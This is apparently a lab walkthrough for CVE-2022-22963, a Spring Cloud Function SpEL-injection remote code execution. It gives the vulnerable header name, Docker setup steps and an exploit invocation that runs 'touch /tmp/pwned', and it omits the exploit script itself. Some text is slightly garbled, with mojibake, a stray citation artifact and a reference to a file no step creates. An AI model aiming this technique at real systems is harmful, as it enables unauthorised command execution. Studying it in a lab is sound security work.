## https://sploitus.com/exploit?id=A4DE7943-235D-5CDA-9110-735BB44BC3A8
# CVE-2022-22963 โ Demo Methodology
## โ ๏ธ Overview
This demo shows a **Remote Code Execution (RCE)** vulnerability in Spring Cloud Function:
:contentReference[oaicite:0]{index=0}
The vulnerability allows execution of system commands through SpEL injection via the HTTP header:
```
spring.cloud.function.routing-expression
```
๐ This is a **blind RCE**, meaning:
- commands execute on the target
- but **no output is returned in HTTP response**
---
# 1. Start the Vulnerable Docker Container
```bash
docker run -p 8080:8080 spring4shell/cve-2022-22963
```
Verify:
```bash
curl http://127.0.0.1:8080
```
---
# 2. Save the Exploit
Save as:
```bash
exploit.py
```
---
# 3. Execute Commands
## Basic Syntax
```bash
python exploit.py http://127.0.0.1:8080 ""
```
---
# 4. Demonstration Payloads (Blind RCE)
โ ๏ธ All results must be verified inside the container (Docker exec).
---
## Create a marker file (proof of execution)
```bash
python exploit.py http://127.0.0.1:8080 "touch /tmp/pwned"
```
---
# 5. Verify Impact (Inside Docker)
List containers:
```bash
docker ps
```
Enter the container:
```bash
docker exec -it bash
```
Check results:
```bash
ls /tmp
cat /tmp/demo.txt
cat /tmp/pwned
```
---
# 6. Key Notes
- This is a **Blind RCE**
- HTTP response does NOT contain command output
- HTTP `500 Internal Server Error` is expected even when execution succeeds
- Impact is demonstrated via:
- file creation
- file modification
- filesystem changes inside container
---
# 7. What this proves
This vulnerability allows:
- Remote command execution
- Full control over container runtime
- File system manipulation
- Potential container compromise
---